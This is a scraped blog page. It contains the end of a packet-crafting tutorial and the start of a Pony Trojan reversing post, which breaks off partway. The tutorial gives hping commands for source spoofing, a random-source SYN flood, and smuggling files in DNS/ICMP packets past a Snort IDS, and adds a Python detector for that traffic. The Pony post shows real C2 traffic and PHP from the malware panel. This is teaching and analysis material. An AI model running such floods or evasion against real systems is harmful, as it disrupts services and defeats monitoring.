<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Playing: </span>When the packets are ready, packet playing sends them to the targeted machine and collects the resulting packets for further analysis. If the required information is not obtained, the attacker goes back to the editing phase and modifies the packet until the required result is obtained.</div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Analysis:</span> The response packets are captured by the attacker and analyzed to extract information. Sniffing tools such as Wireshark, tcpdump and dsniff are used for this purpose. This step either yields a route into the targeted system or at least gives the attacker enough data to tune the attack.<br /><br /><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Tools For Packet Crafting: </span><span style="font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 25.9px;">Hping, Nemesis, Netcat, Scapy, Socat</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s carry out a test to understand the creation and working of a crafted packet and its effect on a firewall.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Test Requirements</span></div>
<ul style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; list-style: disc; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
Two machines (one with Hping and the other with Snort installed).</div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
Working connection between two machines.</div>
</li>
</ul>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Hping</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This is a utility that helps us assemble and send ICMP, UDP or TCP packets and then display the results. It is similar to the ping command, but it offers far more options to customize the packet to be sent. This helps to map the firewall rules of a targeted system.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Snort</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Snort is a free network intrusion detection and prevention system. It lets us carry out real-time traffic analysis, packet logging, protocol analysis, content searching, etc. on a network.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Testing</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft1.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 1: Packet Crafting test setup</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now we are going to check how a packet can be crafted from a system using Hping, and how it can be customized to pass unnoticed on a network. We are using Snort as the IDS on the target machine. This should show that packet crafting is a serious issue that must be studied in order to prevent attacks.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
First, install Hping on the source machine. It is a multi-platform command line tool; we are using two Linux machines for the test. The installation package can be downloaded from various websites. The next step is to install the intrusion detection software at the destination end: download the latest version of Snort together with WinPcap and install it on the machine. WinPcap is a driver that helps in capturing packets. After setting up the two machines, establish a connection between them to transfer the packets, and check the connection before sending any.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These are the steps to set up the test environment. Now we have to craft the packet using Hping. Hping has various arguments for modifying the packet to be sent according to the requirement; they are listed in Hping’s manual page. Before sending the packet, determine the address of the target machine; here it is 192.168.0.10. Now write the command for packet creation.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Hping is a command line tool. When creating packets, the options must be chosen carefully so that the packet reaches the targeted system without being detected. An example is given below:</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; margin-left: 36pt; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping 192.168.0.10 --udp --spoof 192.168.1.150</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The packets are sent over UDP to machine 192.168.0.10 with a spoofed source IP of 192.168.1.150.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft2.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 2: Spoofing to UDP port.</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft3.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 3: Spoofed address on target system hiding original address</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting can also be used to carry out DoS attacks against a targeted machine by flooding packets to a predetermined port. The number of packets reaching the port exceeds what the service on that port can handle; the system fails and finally becomes non-responsive to any request made to it.</div>
<div class="main post-col-2-3" style="border: 0px; box-sizing: border-box; float: left; font-family: inherit; font-size: 16px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 670px; padding: 0px; vertical-align: baseline; width: 670px;">
<article class="post-content" style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; float: left; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.85em; margin: 0px; padding: 50px 45px 36px; vertical-align: baseline; width: 670px;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Before sending a packet to the system, Hping can be used to carry out a port scan. This gives the attacker information on the available open ports so that the attack can be carried out more easily; the weakest port is selected to gain access to the system.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; margin-left: 72pt; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping3 -S 192.168.0.10 -p 80 -c 2</em></span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This command scans port number 80 of the machine with IP 192.168.0.10 with two SYN packets (-c 2). There are also options to scan all ports of a machine, which gives the attacker the complete status of the ports in a system.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; margin-left: 36pt; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping 192.168.0.10 -S -p 22 --rand-source --flood</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This command floods port number 22 of the mentioned machine with SYN packets from random source addresses. As the flooding starts, the machine becomes non-responsive; when the flooding is stopped, the machine returns to its normal state.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft4.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 4: Command for flooding a machine</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft5.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 5: Result displayed by Snort after flooding.</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We can see from the above image that a large number of packets have been dumped on the targeted machine within a short time. The IDS does not alert on the packets while the flooding is in progress; when the flooding stops, Snort displays only the number of packets received. The system cannot handle the traffic created by the flood and becomes non-responsive. No signature alerts are generated during the process.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">DNS and ICMP Packet Crafting</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The Domain Name System (DNS) is the system responsible for resolving domain names. DNS uses UDP port 53 for normal operations and can use TCP port 53 for zone transfers and other oversized replies. Once an address is entered into the browser’s URL bar, the browser tries to resolve it to an IP. If the address is not already known, a DNS request is sent to the DNS server configured on the client. We can craft such a packet using Hping so that the firewall does not block it.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping -2 -p 53 -E data.dns -d 31 192.168.0.10</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Here a UDP packet (-2) is sent to port 53 of the target (192.168.0.10), carrying data read from the file “data.dns” (-E) with the data size set to 31 bytes (-d 31).</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft6.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 6: Sending a file to target’s DNS port</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When sending a data file through Hping, the IDS on the target machine does not detect the presence of the attached file; it only displays the total number of packets transmitted and received. Even though Hping reports the destination as unreachable, the packets are received at the target.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Hping can also be used to send ICMP (Internet Control Message Protocol) packets. ICMP packets are usually used to troubleshoot networks and to gather basic information, for example to check whether a host is alive. Most firewalls let packets such as ICMP and DNS requests pass, so crafted ICMP packets can be used to get through the firewall. At the sender’s end, we have to specify the type of packet, the destination and the other details needed for proper communication.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping 192.168.0.11 -d 100 --icmp --file /data.dns</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Here the file “data.dns” is sent to the target 192.168.0.11 as the 100-byte payload (-d 100) of an ICMP packet.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft7.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 7: File sent using ICMP packet</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Using such crafted packets, a traffic-filtering firewall could be bypassed. From the above test we can conclude that packet crafting is a serious issue that should be taken care of.</div>
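<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The defender’s side of these tests, as an added example that is not part of the original article: a small Python detector run over constructed tcpdump-style lines mimicking the spoofed UDP, random-source SYN flood and oversized ICMP commands above, showing the checks (ingress filtering, per-second SYN rate, echo payload size) that would have raised alerts where Snort only counted packets. The local subnet 192.168.0.0/24, the line format and all thresholds are assumptions.</div>

```python
"""Added detection example (not from the article): checks that would flag the
hping traffic from the tests above, run over constructed tcpdump-style lines.
The subnet 192.168.0.0/24 and the thresholds are assumptions, not Snort defaults."""
import ipaddress
import re
from collections import defaultdict

# Simplified "tcpdump -n" line shapes; every sample line below is constructed.
TCP_RE = re.compile(
    r"^(?P<ts>\d+:\d+:\d+\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]")
UDP_RE = re.compile(
    r"^(?P<ts>\d+:\d+:\d+\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): UDP, length (?P<length>\d+)")
ICMP_RE = re.compile(
    r"^(?P<ts>\d+:\d+:\d+\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo request, id \d+, seq \d+, length (?P<length>\d+)")

LOCAL_NET = ipaddress.ip_network("192.168.0.0/24")  # assumed internal subnet
SYN_THRESHOLD = 20          # SYNs to one dst:port within one second
RANDOM_SOURCE_RATIO = 0.8   # distinct-source fraction that suggests --rand-source
ICMP_MAX_PAYLOAD = 64       # echo payload bytes still considered a normal ping
ICMP_HEADER = 8             # tcpdump's ICMP length includes the 8-byte header


def _seconds(ts):
    """Convert HH:MM:SS.ffffff to seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_line(line):
    """Return a dict for one recognised packet line, or None otherwise."""
    for proto, regex in (("tcp", TCP_RE), ("udp", UDP_RE), ("icmp", ICMP_RE)):
        m = regex.match(line)
        if m:
            pkt = m.groupdict()
            pkt["proto"] = proto
            pkt["t"] = _seconds(pkt["ts"])
            return pkt
    return None


def detect(lines):
    """Apply three checks and return the findings grouped by rule name."""
    findings = {"spoofed-source": set(), "syn-flood": [], "large-icmp-payload": []}
    syn_buckets = defaultdict(list)  # (dst, dport, second) -> source addresses
    for line in lines:
        pkt = parse_line(line)
        if pkt is None:
            continue
        src = ipaddress.ip_address(pkt["src"])
        dst = ipaddress.ip_address(pkt["dst"])
        # Check 1 (ingress filtering): a local destination with a non-local source.
        if dst in LOCAL_NET and src not in LOCAL_NET:
            findings["spoofed-source"].add(pkt["src"])
        # Check 2: bucket SYN-only segments per destination port and second.
        if pkt["proto"] == "tcp" and pkt["flags"] == "S":
            syn_buckets[(pkt["dst"], int(pkt["dport"]), int(pkt["t"]))].append(pkt["src"])
        # Check 3: echo requests carrying more data than a normal ping (-d 100 case).
        if pkt["proto"] == "icmp":
            payload = int(pkt["length"]) - ICMP_HEADER
            if payload > ICMP_MAX_PAYLOAD:
                findings["large-icmp-payload"].append(
                    {"src": pkt["src"], "dst": pkt["dst"], "payload": payload})
    for (dst, dport, second), sources in syn_buckets.items():
        if len(sources) >= SYN_THRESHOLD:
            ratio = len(set(sources)) / len(sources)
            findings["syn-flood"].append(
                {"dst": dst, "dport": dport, "second": second, "count": len(sources),
                 "random_source": ratio >= RANDOM_SOURCE_RATIO})
    return findings


def build_sample():
    """Constructed tcpdump-style lines mimicking the article's hping commands."""
    lines = []
    # Normal traffic: one internal client opening web connections over 5 seconds.
    for i in range(5):
        lines.append(f"12:00:0{i}.100000 IP 192.168.0.5.{40000 + i} > 192.168.0.10.80: "
                     f"Flags [S], seq {i}, win 64240, length 0")
    # hping 192.168.0.10 --udp --spoof 192.168.1.150 (hping's default port is 0).
    lines.append("12:00:05.200000 IP 192.168.1.150.2561 > 192.168.0.10.0: UDP, length 0")
    # hping ... -S -p 22 --rand-source --flood: 25 SYNs in one second, all distinct sources
    # (sequential here for determinism; hping would randomise them).
    for i in range(25):
        lines.append(f"12:00:06.{i:06d} IP 10.0.0.{i + 1}.{1024 + i} > 192.168.0.10.22: "
                     f"Flags [S], seq 0, win 512, length 0")
    # A normal 56-byte ping, then hping 192.168.0.11 -d 100 --icmp --file /data.dns.
    lines.append("12:00:07.000000 IP 192.168.0.5 > 192.168.0.11: "
                 "ICMP echo request, id 7, seq 1, length 64")
    lines.append("12:00:07.500000 IP 192.168.0.5 > 192.168.0.11: "
                 "ICMP echo request, id 8, seq 1, length 108")
    return lines


if __name__ == "__main__":
    for rule, hits in detect(build_sample()).items():
        print(rule, len(hits), sorted(hits) if isinstance(hits, set) else hits)
```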
</article></div>
</li>
</ul>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-44336536274579363742015-12-31T14:56:00.000+05:302015-12-31T14:56:08.284+05:30Pony Trojan reversing (part-II)<div dir="ltr" style="text-align: left;" trbidi="on">
Pony is a credential-stealing Trojan that has been active for quite a while now. One campaign alone was tied to the theft of over $200,000 in bitcoins ( <a href="https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/"><span style="color: navy; text-decoration: underline;">https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/</span></a> ). In this post we cover static reversing of the Pony Trojan.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://pre00.deviantart.net/d4c5/th/pre/i/2015/299/d/a/inktober_21st_by_trojan_pony-d9ehl52.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://pre00.deviantart.net/d4c5/th/pre/i/2015/299/d/a/inktober_21st_by_trojan_pony-d9ehl52.jpg" height="320" width="238" /></a></div>
<br />
Tools required <br />
<ol>
<li>VMware</li>
<li>IDA Disassembler</li>
<li>OllyDbg debugger</li>
<li>Hex editor</li>
</ol>
If you haven't gone through Part I, we recommend reading it before this post.<br />
In this post we examine the command-and-control traffic and then statically analyse the binary.<br />
Let's look at the captured traffic (pcap):<br />
<pre style="font-family: Courier New;">
POST /gate.php HTTP/1.0
Host: titratresfi.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 274
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

…..ql.H.l.W.*.F.udS]&lt;…L….^.cF.;!….A5 v…&lt;6…….D….Z.+.xld.{o.JFY`.D..Z….aP.}U…W..6..&lt;NR.7@P.1..p5t.`……U
&gt;..d.!..3..tHJ.J..I……g8…8.`..`.f…i..J..(r..MrnW…f.r.v[…….t.}…D`%}U…m…K.E.n..R&+.iD.:4…9.L.\…EnR…?.&lt;…|.B…$o..
…/….A

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 12 Nov 2015 15:35:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.41

.Z..O….&P..na..+..
</pre>
This is the basic initialisation request sent to the server and, apparently, it is encrypted. Let's look at the Pony panel source code to figure out what type of encryption it uses and how the data can be decoded.<br />
Looking at the source of gate.php, which handles the basic request, we find that it first checks that the size is greater than 12 bytes and not above max_db_len_size. After that the data is checked against a header in verify_report_file_header(), which tells us that the report carries a header as well.<br />
Let's dig into the source code of password_modules.php to find out.<br />
The following functions are responsible for verifying the packet header:<br />
<pre style="font-family: Courier New;">
public static function verify_new_file_header(&$data)
{
    if (strlen($data) < 4)
        return false;
    $max_header_len = max(strlen(REPORT_HEADER), strlen(REPORT_PACKED_HEADER), strlen(REPORT_CRYPTED_HEADER));
    $rc4_key = substr($data, 0, 4);
    $encrypted_header = substr($data, 4, $max_header_len);
    $decrypted_header = rc4Decrypt($rc4_key, $encrypted_header);
    return self::verify_old_file_header($decrypted_header);
}

public static function verify_old_file_header(&$data)
{
    if ((substr($data, 0, strlen(REPORT_HEADER))) == REPORT_HEADER)
        return true;
    if ((substr($data, 0, strlen(REPORT_PACKED_HEADER))) == REPORT_PACKED_HEADER)
        return true;
    if ((substr($data, 0, strlen(REPORT_CRYPTED_HEADER))) == REPORT_CRYPTED_HEADER)
        return true;
    return false;
}

public static function verify_report_file_header(&$data)
{
